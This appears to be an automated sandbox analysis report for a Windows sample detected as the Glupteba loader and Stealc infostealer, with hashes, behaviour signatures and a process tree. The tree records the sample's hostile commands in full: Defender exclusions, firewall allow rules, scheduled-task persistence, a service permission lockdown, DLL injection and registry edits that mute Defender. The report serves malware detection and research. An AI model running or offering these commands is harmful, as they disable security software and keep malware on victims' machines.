Analysis
-
max time kernel
150s -
max time network
152s -
platform
windows11-21h2_x64 -
resource
win11-20240412-en -
resource tags
-
submitted
25-04-2024 08:34
General
-
Target
f6bfa172fb2a124980f8134f6b5c765e7af52133a0c828e87d05b40a1a3f5005.exe
-
Size
789KB
-
MD5
8026082d59bac905bcc4098c69b98743
-
SHA1
5c8bffce653aa3b6c3e14d5f02927648b5ca8768
-
SHA256
f6bfa172fb2a124980f8134f6b5c765e7af52133a0c828e87d05b40a1a3f5005
-
SHA512
304339d26694f1225a23014862676f759c9332ea43ab53c9cb665346228dbed5ece4dca5e41b4d577fdf18ea70f7c61cda852e5122a7fbcf3bdfec5acc0f9f42
-
SSDEEP
12288:UsP3NrvWMBOyImjR4rrRyimS3lE28kNp6MARWch8kMp5okT23gvub5mqn6Ec0Lhy:UsP3NrvW31m9Ysd9lgvu4q6EgtOt3F3u
Malware Config
Signatures
-
Glupteba
Glupteba is a modular loader written in Golang with various components.
-
Glupteba payload 15 IoCs
-
Modifies firewall policy service 2 TTPs 1 IoCs
-
Stealc
Stealc is an infostealer written in C++.
-
UAC bypass 3 TTPs 1 IoCs
-
Windows security bypass 2 TTPs 7 IoCs
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
-
Downloads MZ/PE file
-
Modifies Windows Firewall 2 TTPs 2 IoCs
-
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Drops startup file 7 IoCs
-
Executes dropped EXE 19 IoCs
-
Loads dropped DLL 1 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Themida packer 9 IoCs
Detects Themida, an advanced Windows software protection system.
-
UPX packed file 4 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Windows security modification 2 TTPs 8 IoCs
-
Adds Run key to start application 2 TTPs 3 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 3 IoCs
-
Drops Chrome extension 1 IoCs
-
Drops desktop.ini file(s) 1 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
-
Drops file in System32 directory 42 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
-
Suspicious use of SetThreadContext 3 IoCs
-
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
-
Drops file in Program Files directory 6 IoCs
-
Drops file in Windows directory 10 IoCs
-
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 7 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 4 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: MapViewOfSection 3 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 7 IoCs
-
Suspicious use of SendNotifyMessage 7 IoCs
-
Suspicious use of SetWindowsHookEx 3 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
System policy modification 1 TTPs 1 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\f6bfa172fb2a124980f8134f6b5c765e7af52133a0c828e87d05b40a1a3f5005.exe"C:\Users\Admin\AppData\Local\Temp\f6bfa172fb2a124980f8134f6b5c765e7af52133a0c828e87d05b40a1a3f5005.exe"1⤵
- UAC bypass
- Windows security bypass
- Windows security modification
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
- System policy modification
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\f6bfa172fb2a124980f8134f6b5c765e7af52133a0c828e87d05b40a1a3f5005.exe" -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"2⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"2⤵
- Drops startup file
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Pictures\AHnLC4HTPoTQBvfFYTDQGgzq.exe"C:\Users\Admin\Pictures\AHnLC4HTPoTQBvfFYTDQGgzq.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\u384.0.exe"C:\Users\Admin\AppData\Local\Temp\u384.0.exe"4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 476 -s 10965⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\u384.2\run.exe"C:\Users\Admin\AppData\Local\Temp\u384.2\run.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe5⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe6⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\u384.3.exe"C:\Users\Admin\AppData\Local\Temp\u384.3.exe"4⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD15⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4180 -s 11644⤵
- Program crash
-
C:\Users\Admin\Pictures\PBodhKQkwYo4944fGYN6aCTn.exe"C:\Users\Admin\Pictures\PBodhKQkwYo4944fGYN6aCTn.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\PBodhKQkwYo4944fGYN6aCTn.exe"C:\Users\Admin\Pictures\PBodhKQkwYo4944fGYN6aCTn.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes6⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\bFP7y9UvwrglmZsCw0P01TLb.exe"C:\Users\Admin\Pictures\bFP7y9UvwrglmZsCw0P01TLb.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\bFP7y9UvwrglmZsCw0P01TLb.exe"C:\Users\Admin\Pictures\bFP7y9UvwrglmZsCw0P01TLb.exe"4⤵
- Windows security bypass
- Executes dropped EXE
- Windows security modification
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes6⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe5⤵
- Executes dropped EXE
- Adds Run key to start application
- Manipulates WinMonFS driver.
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll6⤵
- Executes dropped EXE
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- Creates scheduled task(s)
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)7⤵
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)8⤵
- Launches sc.exe
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\bhJ3c6tgDurzcpzQl6wOvaig.exe"C:\Users\Admin\Pictures\bhJ3c6tgDurzcpzQl6wOvaig.exe"3⤵
- Modifies firewall policy service
- Windows security bypass
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Windows security modification
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\SzKigIDAe1j2pUJtKhKBZnNC.exe"C:\Users\Admin\Pictures\SzKigIDAe1j2pUJtKhKBZnNC.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS5B0C.tmp\Install.exe.\Install.exe /RvdidblCuX "385118" /S4⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Enumerates system info in registry
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"5⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True8⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bWycNackLSywaqkmgR" /SC once /ST 08:37:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\FIRIDcf.exe\" em /Vasite_idAwJ 385118 /S" /V1 /F5⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Users\Admin\Pictures\CTcEGVlSRrBrhp7BbbxeNOFp.exe"C:\Users\Admin\Pictures\CTcEGVlSRrBrhp7BbbxeNOFp.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zSB234.tmp\Install.exe.\Install.exe /RvdidblCuX "385118" /S4⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Enumerates system info in registry
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"5⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True8⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bWycNackLSywaqkmgR" /SC once /ST 08:37:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\tEGeVxK.exe\" em /tfsite_idCfk 385118 /S" /V1 /F5⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 400 -p 476 -ip 4761⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 4180 -ip 41801⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
C:\Windows\windefender.exeC:\Windows\windefender.exe1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\tEGeVxK.exeC:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\tEGeVxK.exe em /tfsite_idCfk 385118 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵
-
